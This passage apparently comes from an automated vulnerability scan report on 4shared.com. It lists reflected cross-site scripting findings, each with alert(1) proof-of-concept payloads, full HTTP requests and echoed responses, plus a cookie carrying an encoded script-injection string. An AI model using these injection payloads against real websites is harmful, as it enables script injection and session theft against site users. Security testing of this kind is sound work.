Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9028A42901C0BD18B84955937C69399A.dc278; Path=/
Set-Cookie: df=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: ausk=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: df=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: ausk=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:59 GMT
Connection: close
Content-Length: 33211


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Login or Si
...[SNIP]...
<input type="hidden" name="au" value="18fdd1"style="x:expression(alert(1))"f5d5aa7c370"/>
...[SNIP]...

5.20. http://www.4shared.com/faq.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /faq.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3aae9"-alert(1)-"b86e0dc65d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /faq.jsp3aae9"-alert(1)-"b86e0dc65d2 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /faq.jsp3aae9&quot;-alert(1)-&quot;b86e0dc65d2
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=66F969464FFE73FA334E29977412A1B7.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:04 GMT
Connection: close
Content-Length: 36098


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/faq.jsp3aae9"-alert(1)-"b86e0dc65d2";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.21. http://www.4shared.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4137e"-alert(1)-"30ce14ead11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico4137e"-alert(1)-"30ce14ead11 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278

Response

HTTP/1.1 404 /favicon.ico4137e&quot;-alert(1)-&quot;30ce14ead11
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:51:35 GMT
Content-Length: 36133


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/favicon.ico4137e"-alert(1)-"30ce14ead11";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.22. http://www.4shared.com/icons/16x16/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c041"-alert(1)-"b5aa33779a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /icons9c041"-alert(1)-"b5aa33779a/16x16/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /icons9c041&quot;-alert(1)-&quot;b5aa33779a/16x16/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=10E3680EA5CFAB4BF9BFADD373585B14.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:34 GMT
Connection: close
Content-Length: 36118


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/icons9c041"-alert(1)-"b5aa33779a/16x16/";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
v
...[SNIP]...

5.23. http://www.4shared.com/icons/16x16/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34cc4"-alert(1)-"8ad53ce0672 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /icons/16x1634cc4"-alert(1)-"8ad53ce0672/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /icons/16x1634cc4&quot;-alert(1)-&quot;8ad53ce0672/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=888C0178FF1052C414FDAA58E2CE5F49.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:39 GMT
Connection: close
Content-Length: 36123


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/icons/16x1634cc4"-alert(1)-"8ad53ce0672/";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var win
...[SNIP]...

5.24. http://www.4shared.com/images/blueBanner_plus.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/blueBanner_plus.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cedc"-alert(1)-"98d34b98a53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images4cedc"-alert(1)-"98d34b98a53/blueBanner_plus.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images4cedc&quot;-alert(1)-&quot;98d34b98a53/blueBanner_plus.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:37 GMT
Content-Length: 36227


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images4cedc"-alert(1)-"98d34b98a53/blueBanner_plus.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedbac
...[SNIP]...

5.25. http://www.4shared.com/images/blueBanner_plus.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/blueBanner_plus.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aef3a"-alert(1)-"93d664da704 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/blueBanner_plus.gifaef3a"-alert(1)-"93d664da704 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/blueBanner_plus.gifaef3a&quot;-alert(1)-&quot;93d664da704
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:48 GMT
Content-Length: 36227


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images/blueBanner_plus.gifaef3a"-alert(1)-"93d664da704";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.26. http://www.4shared.com/images/index-premium-features.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/index-premium-features.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8493f"-alert(1)-"1139657276e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images8493f"-alert(1)-"1139657276e/index-premium-features.png HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images8493f&quot;-alert(1)-&quot;1139657276e/index-premium-features.png
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:32 GMT
Content-Length: 36262


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images8493f"-alert(1)-"1139657276e/index-premium-features.png";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function
...[SNIP]...

5.27. http://www.4shared.com/images/index-premium-features.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/index-premium-features.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15de3"-alert(1)-"eb019ce0128 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/index-premium-features.png15de3"-alert(1)-"eb019ce0128 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/index-premium-features.png15de3&quot;-alert(1)-&quot;eb019ce0128
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:43 GMT
Content-Length: 36251


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images/index-premium-features.png15de3"-alert(1)-"eb019ce0128";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.28. http://www.4shared.com/images/spacer.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/spacer.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d78a"-alert(1)-"1ddd3f867cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images3d78a"-alert(1)-"1ddd3f867cb/spacer.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images3d78a&quot;-alert(1)-&quot;1ddd3f867cb/spacer.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:37 GMT
Content-Length: 36182


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images3d78a"-alert(1)-"1ddd3f867cb/spacer.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

5.29. http://www.4shared.com/images/spacer.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/spacer.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce9c3"-alert(1)-"bd60f50799e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/spacer.gifce9c3"-alert(1)-"bd60f50799e HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/spacer.gifce9c3&quot;-alert(1)-&quot;bd60f50799e
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:48 GMT
Content-Length: 36171


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images/spacer.gifce9c3"-alert(1)-"bd60f50799e";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.30. http://www.4shared.com/index.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /index.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e191f"-alert(1)-"6e354f00eec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.jspe191f"-alert(1)-"6e354f00eec HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /index.jspe191f&quot;-alert(1)-&quot;6e354f00eec
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=77F2937069CCE87EA2E64BB3CD685400.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:37 GMT
Connection: close
Content-Length: 36108


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/index.jspe191f"-alert(1)-"6e354f00eec";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.31. http://www.4shared.com/js/index.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/index.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab098"-alert(1)-"8cd6f08d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

